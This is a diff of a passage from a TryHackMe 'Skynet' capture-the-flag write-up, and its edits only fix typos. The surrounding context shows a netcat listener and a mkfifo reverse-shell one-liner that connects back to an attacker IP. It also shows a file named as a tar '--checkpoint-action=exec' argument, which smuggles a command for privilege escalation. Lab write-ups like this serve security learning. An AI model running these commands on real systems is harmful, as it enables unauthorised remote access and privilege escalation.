MaxwellCaron/writeups/TryHackMe/Skynet-Writeup.md

 $ nc -lnvp 9002
 ```

-After trying a few different reverse shells I noticed that the netcat one was the only one that worked so lets use that one.
+After trying a few different reverse shells I noticed that the `netcat` one was the only one that worked so lets use that one.

 ```
 www-data@skynet:/$ cd /var/www/html
 www-data@skynet:/var/www/html$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh"-i 2>&1|nc <YOUR IP> 9002 >/tmp/f" > shell.sh
 ```

-Now that we have created the payloat we need to make the file that will execute it.
+Now that we have created the payload we need to make the file that will execute it.

 ```
 www-data@skynet:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"